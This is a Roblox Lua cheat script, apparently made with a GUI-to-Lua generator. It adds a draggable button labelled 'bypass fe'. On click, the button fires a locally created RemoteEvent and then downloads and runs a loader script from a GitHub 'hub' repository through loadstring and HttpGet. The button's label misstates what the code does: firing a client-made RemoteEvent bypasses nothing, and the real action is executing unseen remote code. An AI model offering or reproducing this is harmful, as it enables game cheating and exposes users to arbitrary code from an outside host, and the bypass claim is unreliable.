--[[ Gui2Lua™ 10zOfficial Version 1.0.0 ]] -- Instances local ScreenGui = Instance.new("ScreenGui") local TextButton = Instance.new("TextButton") -- Properties ScreenGui.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui") ScreenGui.ZIndexBehavior = Enum.ZIndexBehavior.Sibling TextButton.Parent = ScreenGui TextButton.BackgroundColor3 = Color3.new(1, 1, 1) TextButton.BorderColor3 = Color3.new(0, 0, 0) TextButton.BorderSizePixel = 0 TextButton.Position = UDim2.new(0.326594085, 0, 0.444999993, 0) TextButton.Size = UDim2.new(0, 200, 0, 50) TextButton.Font = Enum.Font.SourceSans TextButton.Text = "bypass fe" TextButton.TextColor3 = Color3.new(0, 0, 0) TextButton.TextSize = 14 TextButton.MouseButton1Click:Connect(function() local remote = Instance.new("RemoteEvent") remote.Parent = game.ReplicatedStorage remote.Name = "fe" remote:FireServer() wait(3) loadstring(game:HttpGet('https://raw.githubusercontent.com/FreeRobloxScripts1/Haxker_6666666-Hub/main/loader'))() end) local UserInputService = game:GetService("UserInputService") local gui = TextButton local dragging local dragInput local dragStart local startPos local function update(input) local delta = input.Position - dragStart gui.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y) end gui.InputBegan:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then dragging = true dragStart = input.Position startPos = gui.Position input.Changed:Connect(function() if input.UserInputState == Enum.UserInputState.End then dragging = false end end) end end) gui.InputChanged:Connect(function(input) if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then dragInput = input end end) UserInputService.InputChanged:Connect(function(input) if input == dragInput and dragging then update(input) end end)